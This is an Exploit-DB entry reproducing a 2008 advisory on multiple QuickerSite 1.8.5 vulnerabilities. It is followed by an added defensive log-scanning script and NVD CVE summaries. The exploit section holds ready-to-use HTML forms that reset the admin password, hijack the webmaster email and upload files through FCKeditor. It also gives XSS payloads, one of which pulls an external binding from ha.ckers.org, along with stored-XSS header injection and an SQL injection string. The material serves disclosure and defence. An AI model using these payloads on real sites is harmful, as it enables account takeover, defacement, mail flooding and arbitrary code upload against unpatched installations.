ID: EDB-ID:5733
Type: exploitdb
Reporter: BugReport.IR
Modified: 2008-06-03T00:00:00
Description
QuickerSite 1.8.5 Multiple Remote Vulnerabilities. CVE-2008-6673,CVE-2008-6674,CVE-2008-6675,CVE-2008-6676,CVE-2008-6677,CVE-2008-6678. Webapps exploit for p...
########################## www.BugReport.ir #######################################
#
# AmnPardaz Security Research Team
#
# Title: QuickerSite Multiple Vulnerabilities
# Vendor: www.quickersite.com
# Vulnerable Version: 1.8.5
# Exploit: Available
# Impact: High
# Fix: N/A
# Original Advisory: http://bugreport.ir/index.php?/39
###################################################################################
####################
1. Description:
####################
QuickerSite is a Content Management System for Windows Servers. It is written in ASP/VBScript with an optional pinch of ASP.NET for true image-resizing capabilities. QuickerSite ships with an Access database, with the option to upsize to SQL Server 2000/2005 for busy sites (>1000 visitors/day).
####################
2. Vulnerabilities:
####################
2.1. Insecure Direct Object Reference [in "bs_login.asp"]. Everyone can change admin password.
2.1.1. Exploit:
Check the exploit section.
2.2. Insecure Direct Object Reference [in "bs_login.asp"]. Everyone can edit all the site info., such as admin email address.
2.2.1. Exploit:
Check the exploit section.
2.3. Insecure Direct Object Reference [in "bs_login.asp"]. Everyone can edit all the site design. (Also, all the site settings can be changed by other parameters)
2.3.1. Exploit:
Check the exploit section.
2.4. Failure to Restrict URL Access [in "mailPage.asp"]. Everyone can mailbomb others.
2.4.1. Exploit:
Check the exploit section.
2.5. Cross Site Scripting (XSS) [in "showThumb.aspx"]. Reflected XSS attack by circumventing the ASP.Net XSS denier (Path disclosure on the open error mode).
2.5.1. Exploit:
Check the exploit section.
2.6. Cross Site Scripting (XSS), Failure to Restrict URL Access [in "process_send.asp"]. Redirect Reflected XSS Attack In "SB_redirect" parameter. Reflected XSS, Content Spoofing In "SB_feedback" parameter. Everyone can mailbomb others.
2.6.1. Exploit:
Check the exploit section.
2.7. Cross Site Scripting (XSS) [in "picker.asp"]. Reflected XSS attack in "paramCode" and "cColor" parameters.
2.7.1. Exploit:
Check the exploit section.
2.8. Cross Site Scripting (XSS) [in "rss.asp"]. Stored XSS attack via the "X-FORWARDED-FOR" header, the query string and the "Referer" header. An attacker can execute an XSS against Admin.
2.8.1. Exploit:
Check the exploit section.
2.9. File uploading is allowed by FCKEDITOR.
2.9.1. Exploit:
Check the exploit section.
2.10. Injection Flaws [in "/asp/includes/contact.asp"]. SQL Injection on "check" function in "sNickName" parameter.
2.10.1. Exploit:
Check the exploit section.
####################
3. Exploits:
####################
Original Exploit URL: http://bugreport.ir/index.php?/39/exploit
3.1. Everyone can change admin password.
-------------
<form action="http://[URL]/asp/bs_login.asp?btnAction=cSaveAdminPW" method="post">
adminPassword: <input type="text" name="adminPassword" value="" size="30" /><br />
adminPasswordConfirm: <input type="text" name="adminPasswordConfirm" value="" size="30" /><br />
<input type="submit" />
</form>
-------------
3.2. Everyone can edit all the site info., such as admin email address.
-------------
<form action="http://[URL]/asp/bs_login.asp?btnAction=saveAdmin" method="post">
Site Url: <input type="text" name="sUrl" value="http://www.VICTIM.com" size="100" /><br />
Site AlternateDomains: <input type="text" name="sAlternateDomains" value="http://www.VICTIM-Backup.com" size="100" /><br />
Description: <input type="text" name="sDescription" value="Hacked Description" size="100" /><br />
Site Name: <input type="text" name="siteName" value="Hacked Site Name" size="100" /><br />
Site Title: <input type="text" name="siteTitle" value="Hacked Site Title" size="100" /><br />
CopyRight: <input type="text" name="copyRight" value="Hacked CopyRight" size="100" /><br />
Keywords: <input type="text" name="keywords" value="Hacked KeyWords" size="100" /><br />
Google Analytics: <input type="text" name="googleAnalytics" value="Hacked Google Anal!" size="100" /><br />
Language: <input type="text" name="language" value="1" size="100" /><br />
DatumFormat: <input type="text" name="sDatumFormat" value="1" size="100" /><br />
Webmaster: <input type="text" name="webmaster" value="Hacker" size="100" /><br />
Webmaster Email: <input type="text" name="webmasterEmail" value="MyEmail-ResetPassword@Hacker.Com" size="100" /><br />
Default RSS Link: <input type="text" name="sDefaultRSSLink" value="http://www.VICTIM.com/RSS.asp" size="100" /><br />
<input type="submit" />
</form>
-------------
3.3. Everyone can edit all the site design.
-------------
<form action="http://[URL]/asp/bs_login.asp?btnAction=saveDesign" method="post">
siteWidth: <input type="text" name="siteWidth" value="800" size="30" /><br />
menuWidth: <input type="text" name="menuWidth" value="600" size="30" /><br />
bgColorSides: <input type="text" name="bgColorSides" value="" size="30" /><br />
bgImageLeft: <input type="text" name="bgImageLeft" value="" size="30" /><br />
bgImageRight: <input type="text" name="bgImageRight" value="" size="30" /><br />
mainBGColor: <input type="text" name="mainBGColor" value="" size="30" /><br />
mainBgImage: <input type="text" name="mainBgImage" value="" size="30" /><br />
scheidingsLijnColor: <input type="text" name="scheidingsLijnColor" value="" size="30" /><br />
scheidingsLijnWidth: <input type="text" name="scheidingsLijnWidth" value="100" size="30" /><br />
menuBGColor: <input type="text" name="menuBGColor" value="" size="30" /><br />
menuBGImage: <input type="text" name="menuBGImage" value="" size="30" /><br />
menuBorderColor: <input type="text" name="menuBorderColor" value="" size="30" /><br />
MenuHoverBGColor: <input type="text" name="MenuHoverBGColor" value="" size="30" /><br />
subMenuBorderColor: <input type="text" name="subMenuBorderColor" value="" size="30" /><br />
fontType: <input type="text" name="fontType" value="" size="30" /><br />
fontColor: <input type="text" name="fontColor" value="" size="30" /><br />
linkColor: <input type="text" name="linkColor" value="" size="30" /><br />
fontSize: <input type="text" name="fontSize" value="10" size="30" /><br />
fontWeight: <input type="text" name="fontWeight" value="10" size="30" /><br />
publicIconColor: <input type="text" name="publicIconColor" value="" size="30" /><br />
publicIconColorHover: <input type="text" name="publicIconColorHover" value="" size="30" /><br />
siteAlign: <input type="text" name="siteAlign" value="" size="30" /><br />
menuLocation: <input type="text" name="menuLocation" value="" size="30" /><br />
<input type="hidden" name="defaultTemplate" value="EEE" size="30" />
<input type="submit" />
</form>
-------------
3.4. Everyone can mailbomb others.
-------------
<form action="http://[URL]/mailPage.asp?iId=HILHG" method="post">
<input type="text" name="btnAction" value="sendPage" />
<input type="text" name="sEmail" value="" />
<input type="submit" />
</form>
-------------
3.5. Reflected XSS attack by circumventing the ASP.Net XSS denier (Path disclosure on the open error mode).
-------------
http://[URL]/showThumb.aspx?img=test.jpg&close='STYLE='IRSDL:expr/**/ession(alert("XSS")) (IE)
http://[URL]/showThumb.aspx?img=test.jpg&close='STYLE='-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22) (Mozilla)
http://[URL]/showThumb.aspx?img=test.jpg&close='STYLE='IRSDL:expr/**/ession(alert("XSS"));-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22) (IE+Mozilla)
http://[URL]/showThumb.aspx (Path disc.)
-------------
3.6. Redirect Reflected XSS Attack In "SB_redirect" parameter in "process_send.asp". Reflected XSS, Content Spoofing In "SB_feedback" parameter in "process_send.asp". Everyone can mailbomb others.
-------------
<form action="http://[URL]/default.asp?iId=HILHG&pageAction=send" method="post">
MailTo: <input type="text" name="SB_emailto" value="" size="100" /><br />
Subject: <input type="text" name="SB_subject" value="" size="100" /><br />
Messgae: <input type="text" name="Messgae" value="" size="100" /><br />
SB_feedback: <input type="text" name="SB_feedback" value="XSS" size="100" /><br />
SB_redirect: <input type="text" name="SB_redirect" value="XSS" size="100" /><br />
<input type="submit" />
</form>
-------------
3.7. Reflected XSS attack in "paramCode" and "cColor" parameters in "picker.asp"
-------------
http://[URL]/asp/colorpicker/picker.asp?paramCode=pickerPanel.value=''};alert('XSS')</script><script>
http://[URL]/asp/colorpicker/picker.asp?cColor=irsdl<script>alert('XSS')</script>
-------------
3.8. Stored XSS attack via the "X-FORWARDED-FOR" header, the query string and the "Referer" header. An attacker can execute an XSS against Admin.
-------------
The request must look like this:
GET /rss.asp?iId=IHJEF&s="'><script>alert('XSS-QueryString!')</script> HTTP/1.1
Host: [URL]
User-Agent: Not
Referer: FooNotSite.com"'><script>alert('XSS-Referer!')</script>
X-FORWARDED-FOR: "'><script>alert('XSS-Proxy!')</script>
ACCEPT-LANGUAGE: test
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
-------------
3.9. File uploading is allowed by FCKEDITOR.
-------------
<form enctype="multipart/form-data" action="http://[URL]/fckeditor251/editor/filemanager/connectors/asp/upload.asp" method="post">
<input type="file" name="NewFile"><br>
<input type="submit" value="Send it to the Server">
</form>
-------------
3.10. SQL Injection on "check" function in "sNickName" parameter.
-------------
http://[URL]/default.asp?pageAction=profile
Change "Nickname" to "'or'1'='1" and "'or'1'='2" and see the results
-------------
####################
4. Solution:
####################
Edit the source code to ensure that inputs are properly sanitized for 3.5, 3.6, 3.7, 3.8 and 3.10, and use access control for the others.
Note: First check the vendor and look for the patch.
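A defender-side check for the requests listed in section 3, as an added example that is not part of the original advisory: it scans an IIS W3C access log for admin actions on bs_login.asp from unexpected sources, posts to the FCKeditor upload connector, markup in the query string or Referer, and bursts of mail posts. The log excerpt, its field layout, the admin_ips allowlist and the mail_threshold value are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query cs(Referer) sc-status
2008-06-04 10:00:01 198.51.100.7 POST /asp/bs_login.asp btnAction=saveDesign - 200
2008-06-04 10:00:05 203.0.113.9 POST /asp/bs_login.asp btnAction=cSaveAdminPW - 200
2008-06-04 10:01:00 203.0.113.9 POST /fckeditor251/editor/filemanager/connectors/asp/upload.asp - - 200
2008-06-04 10:02:00 203.0.113.20 GET /showThumb.aspx img=test.jpg&close='STYLE='x:expr/**/ession(1) - 500
2008-06-04 10:02:30 203.0.113.20 GET /rss.asp iId=IHJEF http://example.test/%22'%3E%3Cscript%3E 200
2008-06-04 10:03:00 203.0.113.30 POST /mailPage.asp iId=HILHG - 200
2008-06-04 10:03:01 203.0.113.30 POST /mailPage.asp iId=HILHG - 200
2008-06-04 10:03:02 203.0.113.30 POST /mailPage.asp iId=HILHG - 200
"""

# State-changing actions on bs_login.asp named in sections 3.1 to 3.3.
ADMIN_ACTIONS = {"csaveadminpw", "saveadmin", "savedesign"}
UPLOAD_STEM = "/fckeditor251/editor/filemanager/connectors/asp/upload.asp"
# Markup that has no place in a query string or Referer of these pages.
MARKUP = re.compile(r"[<>]|style\s*=|-moz-binding|expression\s*\(", re.I)


def parse_w3c(log_text):
    """Yield (line_no, record) for each entry, using the #Fields directive."""
    fields = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split()
            if len(values) == len(fields):
                yield line_no, dict(zip(fields, values))


def query_param(query, name):
    """Return the decoded value of one query-string parameter, or ''."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key.lower() == name.lower():
            return unquote_plus(value)
    return ""


def has_markup(value):
    """True if the URL-decoded value carries HTML or CSS-expression markup."""
    decoded = unquote_plus(value)
    decoded = re.sub(r"/\*.*?\*/", "", decoded)  # expr/**/ession -> expression
    return bool(MARKUP.search(decoded))


def scan(log_text, admin_ips=frozenset(), mail_threshold=3):
    """Return (line_no, client_ip, rule) findings for review."""
    findings = []
    mail_posts = Counter()
    for line_no, rec in parse_w3c(log_text):
        ip = rec.get("c-ip", "-")
        method = rec.get("cs-method", "").upper()
        stem = rec.get("cs-uri-stem", "").lower()
        query = rec.get("cs-uri-query", "-")
        if method == "POST" and stem == "/asp/bs_login.asp":
            action = query_param(query, "btnAction").lower()
            if action in ADMIN_ACTIONS and ip not in admin_ips:
                findings.append((line_no, ip, "admin-action:" + action))
        if method == "POST" and stem == UPLOAD_STEM and ip not in admin_ips:
            findings.append((line_no, ip, "fckeditor-upload"))
        if has_markup(query) or has_markup(rec.get("cs(Referer)", "-")):
            findings.append((line_no, ip, "markup-in-request:" + stem))
        is_mail = stem == "/mailpage.asp" or (
            stem == "/default.asp"
            and query_param(query, "pageAction").lower() == "send")
        if method == "POST" and is_mail:
            mail_posts[ip] += 1
            if mail_posts[ip] == mail_threshold:  # report once per source
                findings.append((line_no, ip, "mail-burst"))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, admin_ips={"198.51.100.7"}):
        print(finding)
```

A default W3C log carries neither POST bodies nor the X-FORWARDED-FOR header, so the SB_feedback, SB_redirect and sNickName values and the proxy-header case are not visible to this check without additional logging.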
####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com
# milw0rm.com [2008-06-03]
####################
Related CVE entries (NVD, last seen 2019-05-29T18:09:30):
####################
CVE-2008-6675 (CVSS 4.3, AV:N/AC:M/Au:N/C:N/I:P/A:N; published 2009-04-08T10:30:00, modified 2017-08-17T01:29:00)
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6675
Multiple cross-site scripting (XSS) vulnerabilities in QuickerSite 1.8.5 allow remote attackers to inject arbitrary web script or HTML via (1) the close parameter to showThumb.aspx; (2) SB_redirect and (3) SB_feedback parameters in process_send.asp, as reachable through default.asp; (4) paramCode and (5) cColor parameters to picker.asp; and the (6) query string, (7) Referer header, and (8) X-FORWARDED-FOR header to rss.asp.

CVE-2008-6676 (CVSS 5.0, AV:N/AC:L/Au:N/C:P/I:N/A:N; published 2009-04-08T10:30:00, modified 2017-08-17T01:29:00)
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6676
QuickerSite 1.8.5 allows remote attackers to obtain sensitive information via a request to showThumb.aspx without any parameters, which reveals the installation path in an error message.

CVE-2008-6674 (CVSS 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P; published 2009-04-08T10:30:00, modified 2009-04-23T05:57:00)
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6674
mailPage.asp in QuickerSite 1.8.5 allows remote attackers to flood e-mail accounts with messages via a large number of requests with a modified sEmail parameter.

CVE-2008-6677 (CVSS 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P; published 2009-04-08T10:30:00, modified 2009-04-23T05:57:00)
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6677
Unrestricted file upload vulnerability in fckeditor251/editor/filemanager/connectors/asp/upload.asp in QuickerSite 1.8.5 allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file.

CVE-2008-6673 (CVSS 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P; published 2009-04-08T10:30:00, modified 2009-04-23T05:57:00)
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6673
asp/bs_login.asp in QuickerSite 1.8.5 does not properly restrict access to administrative functionality, which allows remote attackers to (1) change the admin password via the cSaveAdminPW action; (2) modify site information, such as the contact address, via the saveAdmin; and (3) modify the site design via the saveDesign action.

CVE-2008-6678 (CVSS 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P; published 2009-04-08T10:30:00, modified 2017-08-17T01:29:00)
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6678
SQL injection vulnerability in asp/includes/contact.asp in QuickerSite 1.8.5 allows remote attackers to execute arbitrary SQL commands via the sNickName parameter in a profile action to default.asp.